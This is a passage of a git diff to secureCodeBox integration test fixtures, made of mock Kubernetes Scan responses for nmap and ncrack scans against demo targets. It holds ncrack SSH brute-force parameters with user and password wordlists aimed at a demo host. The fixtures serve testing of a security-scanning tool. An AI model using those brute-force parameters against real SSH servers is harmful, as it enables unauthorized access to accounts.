"http://securecodebox-operator-minio.securecodebox-system.svc.cluster.local:9000/securecodebox/scan-c613dd44-626d-44a8-be36-8b71d984068c/findings.json?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=admin%2F20240130%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240130T132525Z&X-Amz-Expires=43200&X-Amz-SignedHeaders=host&X-Amz-Signature=eb1546645b611d5f8e43c696ab11a759c0b6257f046425f1747e639ee88c958e", + "findings": { + "categories": { + "Discovered Credentials": 1 }, - "orderedHookStatuses": [ - [ - { - "hookName": "dssh-cascading-scans", - "jobName": "dssh-cascading-scans-ncrack-dummy-ssh-d47zk-ncrack-ssh-9h-nbfwd", - "priority": 0, - "state": "InProgress", - "type": "ReadOnly" - } - ] - ], - "rawResultDownloadLink": "http://securecodebox-operator-minio.securecodebox-system.svc.cluster.local:9000/securecodebox/scan-c613dd44-626d-44a8-be36-8b71d984068c/ncrack-results.xml?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=admin%2F20240130%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240130T132525Z&X-Amz-Expires=604800&X-Amz-SignedHeaders=host&X-Amz-Signature=228bb75956d8b8b9365bfcb030ecf6a57aeeaeb153d985ce9d52eae5bc241ea6", - "rawResultFile": "ncrack-results.xml", - "rawResultHeadLink": "http://securecodebox-operator-minio.securecodebox-system.svc.cluster.local:9000/securecodebox/scan-c613dd44-626d-44a8-be36-8b71d984068c/ncrack-results.xml?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=admin%2F20240130%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240130T132525Z&X-Amz-Expires=43200&X-Amz-SignedHeaders=host&X-Amz-Signature=a5230e4c81b2315e8aa2339cb3efeb985cd33aed5de02f0e023f161aa98289ec", - "rawResultType": "ncrack-xml", - "state": "Done" - } + "count": 1, + "severities": { + "high": 1 + } + }, + "orderedHookStatuses": [ + [ + { + "hookName": "dssh-cascading-scans", + "jobName": "dssh-cascading-scans-ncrack-dummy-ssh-d47zk-ncrack-ssh-9h-nbfwd", + "priority": 0, + "state": "InProgress", + "type": "ReadOnly" + } + ] + ], + "rawResultDownloadLink": "http://securecodebox-operator-minio.securecodebox-system.svc.cluster.local:9000/securecodebox/scan-c613dd44-626d-44a8-be36-8b71d984068c/ncrack-results.xml?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=admin%2F20240130%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240130T132525Z&X-Amz-Expires=604800&X-Amz-SignedHeaders=host&X-Amz-Signature=228bb75956d8b8b9365bfcb030ecf6a57aeeaeb153d985ce9d52eae5bc241ea6", + "rawResultFile": "ncrack-results.xml", + "rawResultHeadLink": "http://securecodebox-operator-minio.securecodebox-system.svc.cluster.local:9000/securecodebox/scan-c613dd44-626d-44a8-be36-8b71d984068c/ncrack-results.xml?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=admin%2F20240130%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240130T132525Z&X-Amz-Expires=43200&X-Amz-SignedHeaders=host&X-Amz-Signature=a5230e4c81b2315e8aa2339cb3efeb985cd33aed5de02f0e023f161aa98289ec", + "rawResultType": "ncrack-xml", + "state": "Done" } } \ No newline at end of file diff --git a/tests/integration/__testFiles__/mockCascadingScanStatusResponse_Errored.json b/tests/integration/__testFiles__/mockCascadingScanStatusResponse_Errored.json index 95152062fc..e7eb08ea41 100644 --- a/tests/integration/__testFiles__/mockCascadingScanStatusResponse_Errored.json +++ b/tests/integration/__testFiles__/mockCascadingScanStatusResponse_Errored.json @@ -1,215 +1,213 @@ { - "body": { - "apiVersion": "execution.securecodebox.io/v1", - "kind": "Scan", - "metadata": { - "annotations": { - "cascading.securecodebox.io/chain": "ncrack-ssh", - "cascading.securecodebox.io/matched-finding": "ca358271-980b-4f9a-a1b1-92b64f1d2a44", - "cascading.securecodebox.io/parent-scan": "nmap-dummy-ssh-d47zk", - "securecodebox.io/hook": "cascading-scans" + "apiVersion": "execution.securecodebox.io/v1", + "kind": "Scan", + "metadata": { + "annotations": { + "cascading.securecodebox.io/chain": "ncrack-ssh", + "cascading.securecodebox.io/matched-finding": "ca358271-980b-4f9a-a1b1-92b64f1d2a44", + "cascading.securecodebox.io/parent-scan": "nmap-dummy-ssh-d47zk", + "securecodebox.io/hook": "cascading-scans" + }, + "creationTimestamp": "2024-01-30T13:25:25Z", + "finalizers": [ + "s3.storage.securecodebox.io" + ], + "generateName": "ncrack-dummy-ssh-d47zk-ncrack-ssh-", + "generation": 2, + "managedFields": [ + { + "apiVersion": "execution.securecodebox.io/v1", + "fieldsType": "FieldsV1", + "fieldsV1": { + "f:metadata": { + "f:finalizers": { + ".": {}, + "v:\"s3.storage.securecodebox.io\"": {} + } + }, + "f:spec": { + "f:resources": {} + } + }, + "manager": "manager", + "operation": "Update", + "time": "2024-01-30T13:25:25Z" }, - "creationTimestamp": "2024-01-30T13:25:25Z", - "finalizers": [ - "s3.storage.securecodebox.io" - ], - "generateName": "ncrack-dummy-ssh-d47zk-ncrack-ssh-", - "generation": 2, - "managedFields": [ - { - "apiVersion": "execution.securecodebox.io/v1", - "fieldsType": "FieldsV1", - "fieldsV1": { - "f:metadata": { - "f:finalizers": { - ".": {}, - "v:\"s3.storage.securecodebox.io\"": {} - } + { + "apiVersion": "execution.securecodebox.io/v1", + "fieldsType": "FieldsV1", + "fieldsV1": { + "f:metadata": { + "f:annotations": { + ".": {}, + "f:cascading.securecodebox.io/chain": {}, + "f:cascading.securecodebox.io/matched-finding": {}, + "f:cascading.securecodebox.io/parent-scan": {}, + "f:securecodebox.io/hook": {} }, - "f:spec": { - "f:resources": {} + "f:generateName": {}, + "f:ownerReferences": { + ".": {}, + "k:{\"uid\":\"09f2fd3f-2fb3-4ae4-8347-9cbe23af97b3\"}": {} } }, - "manager": "manager", - "operation": "Update", - "time": "2024-01-30T13:25:25Z" - }, - { - "apiVersion": "execution.securecodebox.io/v1", - "fieldsType": "FieldsV1", - "fieldsV1": { - "f:metadata": { - "f:annotations": { + "f:spec": { + ".": {}, + "f:cascades": { + ".": {}, + "f:inheritAffinity": {}, + "f:inheritAnnotations": {}, + "f:inheritEnv": {}, + "f:inheritHookSelector": {}, + "f:inheritInitContainers": {}, + "f:inheritLabels": {}, + "f:inheritTolerations": {}, + "f:inheritVolumes": {}, + "f:matchLabels": { ".": {}, - "f:cascading.securecodebox.io/chain": {}, - "f:cascading.securecodebox.io/matched-finding": {}, - "f:cascading.securecodebox.io/parent-scan": {}, - "f:securecodebox.io/hook": {} + "f:securecodebox.io/intensive": {}, + "f:securecodebox.io/invasive": {} }, - "f:generateName": {}, - "f:ownerReferences": { + "f:scopeLimiter": { ".": {}, - "k:{\"uid\":\"09f2fd3f-2fb3-4ae4-8347-9cbe23af97b3\"}": {} + "f:validOnMissingRender": {} } }, - "f:spec": { - ".": {}, - "f:cascades": { + "f:hookSelector": {}, + "f:parameters": {}, + "f:resourceMode": {}, + "f:scanType": {} + } + }, + "manager": "unknown", + "operation": "Update", + "time": "2024-01-30T13:25:25Z" + }, + { + "apiVersion": "execution.securecodebox.io/v1", + "fieldsType": "FieldsV1", + "fieldsV1": { + "f:status": { + "f:findings": { + "f:categories": { ".": {}, - "f:inheritAffinity": {}, - "f:inheritAnnotations": {}, - "f:inheritEnv": {}, - "f:inheritHookSelector": {}, - "f:inheritInitContainers": {}, - "f:inheritLabels": {}, - "f:inheritTolerations": {}, - "f:inheritVolumes": {}, - "f:matchLabels": { - ".": {}, - "f:securecodebox.io/intensive": {}, - "f:securecodebox.io/invasive": {} - }, - "f:scopeLimiter": { - ".": {}, - "f:validOnMissingRender": {} - } + "f:Discovered Credentials": {} }, - "f:hookSelector": {}, - "f:parameters": {}, - "f:resourceMode": {}, - "f:scanType": {} - } - }, - "manager": "unknown", - "operation": "Update", - "time": "2024-01-30T13:25:25Z" - }, - { - "apiVersion": "execution.securecodebox.io/v1", - "fieldsType": "FieldsV1", - "fieldsV1": { - "f:status": { - "f:findings": { - "f:categories": { - ".": {}, - "f:Discovered Credentials": {} - }, - "f:count": {}, - "f:severities": { - "f:high": {} - } + "f:count": {}, + "f:severities": { + "f:high": {} } } - }, - "manager": "unknown", - "operation": "Update", - "subresource": "status", - "time": "2024-01-30T13:25:41Z" + } }, - { - "apiVersion": "execution.securecodebox.io/v1", - "fieldsType": "FieldsV1", - "fieldsV1": { - "f:status": { + "manager": "unknown", + "operation": "Update", + "subresource": "status", + "time": "2024-01-30T13:25:41Z" + }, + { + "apiVersion": "execution.securecodebox.io/v1", + "fieldsType": "FieldsV1", + "fieldsV1": { + "f:status": { + ".": {}, + "f:findingDownloadLink": {}, + "f:findingHeadLink": {}, + "f:findings": { ".": {}, - "f:findingDownloadLink": {}, - "f:findingHeadLink": {}, - "f:findings": { - ".": {}, - "f:severities": {} - }, - "f:orderedHookStatuses": {}, - "f:rawResultDownloadLink": {}, - "f:rawResultFile": {}, - "f:rawResultHeadLink": {}, - "f:rawResultType": {}, - "f:state": {} - } - }, - "manager": "manager", - "operation": "Update", - "subresource": "status", - "time": "2024-01-30T13:25:45Z" - } - ], - "name": "ncrack-dummy-ssh-d47zk-ncrack-ssh-9ht7b", - "namespace": "integration-tests", - "ownerReferences": [ - { - "apiVersion": "execution.securecodebox.io/v1", - "blockOwnerDeletion": true, - "controller": true, - "kind": "Scan", - "name": "nmap-dummy-ssh-d47zk", - "uid": "09f2fd3f-2fb3-4ae4-8347-9cbe23af97b3" - } - ], - "resourceVersion": "20705", - "uid": "c613dd44-626d-44a8-be36-8b71d984068c" - }, - "spec": { - "cascades": { - "inheritAffinity": true, - "inheritAnnotations": true, - "inheritEnv": false, - "inheritHookSelector": false, - "inheritInitContainers": false, - "inheritLabels": true, - "inheritTolerations": true, - "inheritVolumes": false, - "matchLabels": { - "securecodebox.io/intensive": "high", - "securecodebox.io/invasive": "invasive" + "f:severities": {} + }, + "f:orderedHookStatuses": {}, + "f:rawResultDownloadLink": {}, + "f:rawResultFile": {}, + "f:rawResultHeadLink": {}, + "f:rawResultType": {}, + "f:state": {} + } }, - "scopeLimiter": { - "validOnMissingRender": false - } + "manager": "manager", + "operation": "Update", + "subresource": "status", + "time": "2024-01-30T13:25:45Z" + } + ], + "name": "ncrack-dummy-ssh-d47zk-ncrack-ssh-9ht7b", + "namespace": "integration-tests", + "ownerReferences": [ + { + "apiVersion": "execution.securecodebox.io/v1", + "blockOwnerDeletion": true, + "controller": true, + "kind": "Scan", + "name": "nmap-dummy-ssh-d47zk", + "uid": "09f2fd3f-2fb3-4ae4-8347-9cbe23af97b3" + } + ], + "resourceVersion": "20705", + "uid": "c613dd44-626d-44a8-be36-8b71d984068c" + }, + "spec": { + "cascades": { + "inheritAffinity": true, + "inheritAnnotations": true, + "inheritEnv": false, + "inheritHookSelector": false, + "inheritInitContainers": false, + "inheritLabels": true, + "inheritTolerations": true, + "inheritVolumes": false, + "matchLabels": { + "securecodebox.io/intensive": "high", + "securecodebox.io/invasive": "invasive" }, - "hookSelector": {}, - "parameters": [ - "-v", - "-d10", - "-U", - "/ncrack/users.txt", - "-P", - "/ncrack/passwords.txt", - "-p", - "ssh:22", - "dummy-ssh.demo-targets.svc" - ], - "resourceMode": "namespaceLocal", - "resources": {}, - "scanType": "ncrack" + "scopeLimiter": { + "validOnMissingRender": false + } }, - "status": { - "findingDownloadLink": "http://securecodebox-operator-minio.securecodebox-system.svc.cluster.local:9000/securecodebox/scan-c613dd44-626d-44a8-be36-8b71d984068c/findings.json?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=admin%2F20240130%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240130T132525Z&X-Amz-Expires=604800&X-Amz-SignedHeaders=host&X-Amz-Signature=39576bace58a75c3daba5097a26215a7b99ca62de62fb0e3066939c6ea4b17a2", - "findingHeadLink": "http://securecodebox-operator-minio.securecodebox-system.svc.cluster.local:9000/securecodebox/scan-c613dd44-626d-44a8-be36-8b71d984068c/findings.json?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=admin%2F20240130%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240130T132525Z&X-Amz-Expires=43200&X-Amz-SignedHeaders=host&X-Amz-Signature=eb1546645b611d5f8e43c696ab11a759c0b6257f046425f1747e639ee88c958e", - "findings": { - "categories": { - "Discovered Credentials": 1 - }, - "count": 1, - "severities": { - "high": 1 - } + "hookSelector": {}, + "parameters": [ + "-v", + "-d10", + "-U", + "/ncrack/users.txt", + "-P", + "/ncrack/passwords.txt", + "-p", + "ssh:22", + "dummy-ssh.demo-targets.svc" + ], + "resourceMode": "namespaceLocal", + "resources": {}, + "scanType": "ncrack" + }, + "status": { + "findingDownloadLink": "http://securecodebox-operator-minio.securecodebox-system.svc.cluster.local:9000/securecodebox/scan-c613dd44-626d-44a8-be36-8b71d984068c/findings.json?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=admin%2F20240130%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240130T132525Z&X-Amz-Expires=604800&X-Amz-SignedHeaders=host&X-Amz-Signature=39576bace58a75c3daba5097a26215a7b99ca62de62fb0e3066939c6ea4b17a2", + "findingHeadLink": "http://securecodebox-operator-minio.securecodebox-system.svc.cluster.local:9000/securecodebox/scan-c613dd44-626d-44a8-be36-8b71d984068c/findings.json?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=admin%2F20240130%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240130T132525Z&X-Amz-Expires=43200&X-Amz-SignedHeaders=host&X-Amz-Signature=eb1546645b611d5f8e43c696ab11a759c0b6257f046425f1747e639ee88c958e", + "findings": { + "categories": { + "Discovered Credentials": 1 }, - "orderedHookStatuses": [ - [ - { - "hookName": "dssh-cascading-scans", - "jobName": "dssh-cascading-scans-ncrack-dummy-ssh-d47zk-ncrack-ssh-9h-nbfwd", - "priority": 0, - "state": "InProgress", - "type": "ReadOnly" - } - ] - ], - "rawResultDownloadLink": "http://securecodebox-operator-minio.securecodebox-system.svc.cluster.local:9000/securecodebox/scan-c613dd44-626d-44a8-be36-8b71d984068c/ncrack-results.xml?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=admin%2F20240130%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240130T132525Z&X-Amz-Expires=604800&X-Amz-SignedHeaders=host&X-Amz-Signature=228bb75956d8b8b9365bfcb030ecf6a57aeeaeb153d985ce9d52eae5bc241ea6", - "rawResultFile": "ncrack-results.xml", - "rawResultHeadLink": "http://securecodebox-operator-minio.securecodebox-system.svc.cluster.local:9000/securecodebox/scan-c613dd44-626d-44a8-be36-8b71d984068c/ncrack-results.xml?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=admin%2F20240130%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240130T132525Z&X-Amz-Expires=43200&X-Amz-SignedHeaders=host&X-Amz-Signature=a5230e4c81b2315e8aa2339cb3efeb985cd33aed5de02f0e023f161aa98289ec", - "rawResultType": "ncrack-xml", - "state": "Errored", - "errorDescription": "Mocked Error" - } + "count": 1, + "severities": { + "high": 1 + } + }, + "orderedHookStatuses": [ + [ + { + "hookName": "dssh-cascading-scans", + "jobName": "dssh-cascading-scans-ncrack-dummy-ssh-d47zk-ncrack-ssh-9h-nbfwd", + "priority": 0, + "state": "InProgress", + "type": "ReadOnly" + } + ] + ], + "rawResultDownloadLink": "http://securecodebox-operator-minio.securecodebox-system.svc.cluster.local:9000/securecodebox/scan-c613dd44-626d-44a8-be36-8b71d984068c/ncrack-results.xml?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=admin%2F20240130%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240130T132525Z&X-Amz-Expires=604800&X-Amz-SignedHeaders=host&X-Amz-Signature=228bb75956d8b8b9365bfcb030ecf6a57aeeaeb153d985ce9d52eae5bc241ea6", + "rawResultFile": "ncrack-results.xml", + "rawResultHeadLink": "http://securecodebox-operator-minio.securecodebox-system.svc.cluster.local:9000/securecodebox/scan-c613dd44-626d-44a8-be36-8b71d984068c/ncrack-results.xml?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=admin%2F20240130%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240130T132525Z&X-Amz-Expires=43200&X-Amz-SignedHeaders=host&X-Amz-Signature=a5230e4c81b2315e8aa2339cb3efeb985cd33aed5de02f0e023f161aa98289ec", + "rawResultType": "ncrack-xml", + "state": "Errored", + "errorDescription": "Mocked Error" } } \ No newline at end of file diff --git a/tests/integration/__testFiles__/mockListNamespacedJobResponse.json b/tests/integration/__testFiles__/mockListNamespacedJobResponse.json index 2e56030b7d..4aaa6e6075 100644 --- a/tests/integration/__testFiles__/mockListNamespacedJobResponse.json +++ b/tests/integration/__testFiles__/mockListNamespacedJobResponse.json @@ -1,13 +1,11 @@ { - "body": { - "apiVersion": "batch/v1", - "items": [], - "kind": "JobList", - "metadata": { - "_continue": "undefined", - "remainingItemCount": "undefined", - "resourceVersion": "6097", - "selfLink": "undefined" - } + "apiVersion": "batch/v1", + "items": [], + "kind": "JobList", + "metadata": { + "_continue": "undefined", + "remainingItemCount": "undefined", + "resourceVersion": "6097", + "selfLink": "undefined" } } \ No newline at end of file diff --git a/tests/integration/__testFiles__/mockListNamespacedPodResponse.json b/tests/integration/__testFiles__/mockListNamespacedPodResponse.json index 89f33ba2cb..53307cfa2b 100644 --- a/tests/integration/__testFiles__/mockListNamespacedPodResponse.json +++ b/tests/integration/__testFiles__/mockListNamespacedPodResponse.json @@ -1,37 +1,35 @@ { - "body": { - "items": [ - { - "metadata": { - "name": "pod-1", - "namespace": "default", - "labels": { - "job-name": "example-job" - } - }, - "spec": { - "containers": [ - { - "name": "container-1", - "image": "nginx:1.7.9", - "ports": [ - { - "containerPort": 80 - } - ] - } - ] - }, - "status": { - "phase": "Running", - "conditions": [ - { - "type": "Ready", - "status": "True" - } - ] + "items": [ + { + "metadata": { + "name": "pod-1", + "namespace": "default", + "labels": { + "job-name": "example-job" } + }, + "spec": { + "containers": [ + { + "name": "container-1", + "image": "nginx:1.7.9", + "ports": [ + { + "containerPort": 80 + } + ] + } + ] + }, + "status": { + "phase": "Running", + "conditions": [ + { + "type": "Ready", + "status": "True" + } + ] } - ] - } + } + ] } \ No newline at end of file diff --git a/tests/integration/__testFiles__/mockReadNamespacedPodLogResponse.json b/tests/integration/__testFiles__/mockReadNamespacedPodLogResponse.json index 9938392287..a9a837c4b4 100644 --- a/tests/integration/__testFiles__/mockReadNamespacedPodLogResponse.json +++ b/tests/integration/__testFiles__/mockReadNamespacedPodLogResponse.json @@ -1,6 +1 @@ -{ - "response": { - "status_code": 200, - "body": "u001b[39m\u001b[0m\n\u001b[31mHTTPConnectionPool(host='old-typo3.demo-targets.svc', port=80): Max retries exceeded with url: / (Caused by NameResolutionError(\": Failed to resolve 'old-typo3.demo-targets.svc' ([Errno -2] Name does not resolve)\"))\u001b[39m\n\u001b[31mHTTPConnectionPool(host='old-typo3.demo-targets.svc', port=80): Max retries exceeded with url: /fdhmndovji (Caused by NameResolutionError(\": Failed to resolve 'old-typo3.demo-targets.svc' ([Errno -2] Name does not resolve)\"))\u001b[39m\n\u001b[31m\n[x] It seems that Typo3 is not used on this domain\n\u001b[39m\n" - } -} \ No newline at end of file +"u001b[39m\u001b[0m\n\u001b[31mHTTPConnectionPool(host='old-typo3.demo-targets.svc', port=80): Max retries exceeded with url: / (Caused by NameResolutionError(\": Failed to resolve 'old-typo3.demo-targets.svc' ([Errno -2] Name does not resolve)\"))\u001b[39m\n\u001b[31mHTTPConnectionPool(host='old-typo3.demo-targets.svc', port=80): Max retries exceeded with url: /fdhmndovji (Caused by NameResolutionError(\": Failed to resolve 'old-typo3.demo-targets.svc' ([Errno -2] Name does not resolve)\"))\u001b[39m\n\u001b[31m\n[x] It seems that Typo3 is not used on this domain\n\u001b[39m\n" \ No newline at end of file diff --git a/tests/integration/__testFiles__/mockScanCreationResponse.json b/tests/integration/__testFiles__/mockScanCreationResponse.json index 98c9f362c9..5c61591964 100644 --- a/tests/integration/__testFiles__/mockScanCreationResponse.json +++ b/tests/integration/__testFiles__/mockScanCreationResponse.json @@ -1,49 +1,47 @@ { - "body": { - "apiVersion": "execution.securecodebox.io/v1", - "kind": "Scan", - "metadata": { - "creationTimestamp": "2024-01-16T14:40:59Z", - "generateName": "nmap-example-", - "generation": 1, - "managedFields": [ - { - "apiVersion": "execution.securecodebox.io/v1", - "fieldsType": "FieldsV1", - "fieldsV1": { - "f:metadata": { - "f:generateName": {} - }, - "f:spec": { - ".": {}, - "f:initContainers": {}, - "f:parameters": {}, - "f:resourceMode": {}, - "f:scanType": {}, - "f:volumeMounts": {}, - "f:volumes": {} - } + "apiVersion": "execution.securecodebox.io/v1", + "kind": "Scan", + "metadata": { + "creationTimestamp": "2024-01-16T14:40:59Z", + "generateName": "nmap-example-", + "generation": 1, + "managedFields": [ + { + "apiVersion": "execution.securecodebox.io/v1", + "fieldsType": "FieldsV1", + "fieldsV1": { + "f:metadata": { + "f:generateName": {} }, - "manager": "unknown", - "operation": "Update", - "time": "2024-01-16T14:40:59Z" - } - ], - "name": "nmap-example-pw8vt", - "namespace": "integration-tests", - "resourceVersion": "1867", - "uid": "4ebccf10-ac84-4e85-91bc-1e4d60b45697" - }, - "spec": { - "initContainers": [], - "parameters": [ - "-p80", - "old-wordpress.demo-targets.svc" - ], - "resourceMode": "namespaceLocal", - "scanType": "nmap", - "volumeMounts": [], - "volumes": [] - } + "f:spec": { + ".": {}, + "f:initContainers": {}, + "f:parameters": {}, + "f:resourceMode": {}, + "f:scanType": {}, + "f:volumeMounts": {}, + "f:volumes": {} + } + }, + "manager": "unknown", + "operation": "Update", + "time": "2024-01-16T14:40:59Z" + } + ], + "name": "nmap-example-pw8vt", + "namespace": "integration-tests", + "resourceVersion": "1867", + "uid": "4ebccf10-ac84-4e85-91bc-1e4d60b45697" + }, + "spec": { + "initContainers": [], + "parameters": [ + "-p80", + "old-wordpress.demo-targets.svc" + ], + "resourceMode": "namespaceLocal", + "scanType": "nmap", + "volumeMounts": [], + "volumes": [] } } \ No newline at end of file diff --git a/tests/integration/__testFiles__/mockScanStatusResponse.json b/tests/integration/__testFiles__/mockScanStatusResponse.json index d1d2513e51..fc82d5180b 100644 --- a/tests/integration/__testFiles__/mockScanStatusResponse.json +++ b/tests/integration/__testFiles__/mockScanStatusResponse.json @@ -1,89 +1,87 @@ { - "body": { - "apiVersion": "execution.securecodebox.io/v1", - "kind": "Scan", - "metadata": { - "creationTimestamp": "2024-01-16T14:45:28Z", - "finalizers": [ - "s3.storage.securecodebox.io" - ], - "generateName": "nmap-example-", - "generation": 2, - "managedFields": [ - { - "apiVersion": "execution.securecodebox.io/v1", - "fieldsType": "FieldsV1", - "fieldsV1": { - "f:metadata": { - "f:finalizers": { - ".": {}, - "v:\"s3.storage.securecodebox.io\"": {} - } - }, - "f:spec": { - "f:resources": {} + "apiVersion": "execution.securecodebox.io/v1", + "kind": "Scan", + "metadata": { + "creationTimestamp": "2024-01-16T14:45:28Z", + "finalizers": [ + "s3.storage.securecodebox.io" + ], + "generateName": "nmap-example-", + "generation": 2, + "managedFields": [ + { + "apiVersion": "execution.securecodebox.io/v1", + "fieldsType": "FieldsV1", + "fieldsV1": { + "f:metadata": { + "f:finalizers": { + ".": {}, + "v:\"s3.storage.securecodebox.io\"": {} } }, - "manager": "manager", - "operation": "Update", - "time": "2024-01-16T14:45:28Z" + "f:spec": { + "f:resources": {} + } }, - { - "apiVersion": "execution.securecodebox.io/v1", - "fieldsType": "FieldsV1", - "fieldsV1": { - "f:status": { + "manager": "manager", + "operation": "Update", + "time": "2024-01-16T14:45:28Z" + }, + { + "apiVersion": "execution.securecodebox.io/v1", + "fieldsType": "FieldsV1", + "fieldsV1": { + "f:status": { + ".": {}, + "f:findingDownloadLink": {}, + "f:findingHeadLink": {}, + "f:findings": { ".": {}, - "f:findingDownloadLink": {}, - "f:findingHeadLink": {}, - "f:findings": { - ".": {}, - "f:severities": {} - }, - "f:rawResultDownloadLink": {}, - "f:rawResultFile": {}, - "f:rawResultHeadLink": {}, - "f:rawResultType": {}, - "f:state": {} - } - }, - "manager": "manager", - "operation": "Update", - "subresource": "status", - "time": "2024-01-16T14:45:28Z" - } - ], - "name": "nmap-example-c24gt", - "namespace": "integration-tests", - "resourceVersion": "2399", - "uid": "5d2ef0e2-ad11-4e58-80d0-5168a137da17" - }, - "spec": { - "parameters": [ - "-p80", - "old-wordpress.demo-targets.svc" - ], - "resourceMode": "namespaceLocal", - "resources": {}, - "scanType": "nmap" - }, - "status": { - "findingDownloadLink": "http://securecodebox-operator-minio.securecodebox-system.svc.cluster.local:9000/securecodebox/scan-c4c2b6ae-f8a1-474d-88ec-c739f6e55f56/findings.json?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=admin%2F20240116%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240116T160849Z&X-Amz-Expires=604800&X-Amz-SignedHeaders=host&X-Amz-Signature=5944f10813f6127d96a3889b06c8256765c3a739db1e23f650ee6ec9ed956b20", - "findingHeadLink": "http://securecodebox-operator-minio.securecodebox-system.svc.cluster.local:9000/securecodebox/scan-c4c2b6ae-f8a1-474d-88ec-c739f6e55f56/findings.json?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=admin%2F20240116%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240116T160849Z&X-Amz-Expires=43200&X-Amz-SignedHeaders=host&X-Amz-Signature=45833109b8ea8d43df51b535730aece4cec1dbf6557a12acd1b95cdbce1f221e", - "findings": { - "categories": { - "Vulnerability": 24 + "f:severities": {} + }, + "f:rawResultDownloadLink": {}, + "f:rawResultFile": {}, + "f:rawResultHeadLink": {}, + "f:rawResultType": {}, + "f:state": {} + } }, - "count": 24, - "severities": { - "high": 24 - } + "manager": "manager", + "operation": "Update", + "subresource": "status", + "time": "2024-01-16T14:45:28Z" + } + ], + "name": "nmap-example-c24gt", + "namespace": "integration-tests", + "resourceVersion": "2399", + "uid": "5d2ef0e2-ad11-4e58-80d0-5168a137da17" + }, + "spec": { + "parameters": [ + "-p80", + "old-wordpress.demo-targets.svc" + ], + "resourceMode": "namespaceLocal", + "resources": {}, + "scanType": "nmap" + }, + "status": { + "findingDownloadLink": "http://securecodebox-operator-minio.securecodebox-system.svc.cluster.local:9000/securecodebox/scan-c4c2b6ae-f8a1-474d-88ec-c739f6e55f56/findings.json?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=admin%2F20240116%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240116T160849Z&X-Amz-Expires=604800&X-Amz-SignedHeaders=host&X-Amz-Signature=5944f10813f6127d96a3889b06c8256765c3a739db1e23f650ee6ec9ed956b20", + "findingHeadLink": "http://securecodebox-operator-minio.securecodebox-system.svc.cluster.local:9000/securecodebox/scan-c4c2b6ae-f8a1-474d-88ec-c739f6e55f56/findings.json?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=admin%2F20240116%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240116T160849Z&X-Amz-Expires=43200&X-Amz-SignedHeaders=host&X-Amz-Signature=45833109b8ea8d43df51b535730aece4cec1dbf6557a12acd1b95cdbce1f221e", + "findings": { + "categories": { + "Vulnerability": 24 }, - "rawResultDownloadLink": "http://securecodebox-operator-minio.securecodebox-system.svc.cluster.local:9000/securecodebox/scan-c4c2b6ae-f8a1-474d-88ec-c739f6e55f56/nmap-result.xml?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=admin%2F20240116%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240116T160849Z&X-Amz-Expires=604800&X-Amz-SignedHeaders=host&X-Amz-Signature=0a91e1756a42fa40ca9bf1bb448ec36c544dd5af4b76c8bc3e91debbb68e349e", - "rawResultFile": "nmap-result.xml", - "rawResultHeadLink": "http://securecodebox-operator-minio.securecodebox-system.svc.cluster.local:9000/securecodebox/scan-c4c2b6ae-f8a1-474d-88ec-c739f6e55f56/nmap-result.xml?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=admin%2F20240116%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240116T160849Z&X-Amz-Expires=43200&X-Amz-SignedHeaders=host&X-Amz-Signature=d09a78fe0e563ac70a75c908319085699894a9eca04d4a32d723862e748e9416", - "rawResultType": "nmap-xml", - "state": "Done" - } + "count": 24, + "severities": { + "high": 24 + } + }, + "rawResultDownloadLink": "http://securecodebox-operator-minio.securecodebox-system.svc.cluster.local:9000/securecodebox/scan-c4c2b6ae-f8a1-474d-88ec-c739f6e55f56/nmap-result.xml?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=admin%2F20240116%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240116T160849Z&X-Amz-Expires=604800&X-Amz-SignedHeaders=host&X-Amz-Signature=0a91e1756a42fa40ca9bf1bb448ec36c544dd5af4b76c8bc3e91debbb68e349e", + "rawResultFile": "nmap-result.xml", + "rawResultHeadLink": 